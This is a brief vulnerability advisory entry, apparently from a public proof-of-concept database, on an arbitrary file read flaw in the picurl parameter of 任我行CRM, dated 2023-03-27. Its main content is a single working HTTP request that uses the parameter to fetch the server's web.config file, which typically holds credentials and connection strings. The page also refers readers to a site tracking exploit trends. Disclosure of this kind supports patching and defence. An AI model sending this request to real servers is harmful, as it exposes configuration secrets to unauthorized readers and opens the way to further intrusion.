任我行CRM picurl 参数存在任意文件读取漏洞

2023-03-27 任我行CRM PoC Public

Description

任我行CRM picurl 参数存在任意文件读取漏洞

PoC

GET /Common/PictureView1/?picurl=/web.config HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

Related Vulnerabilities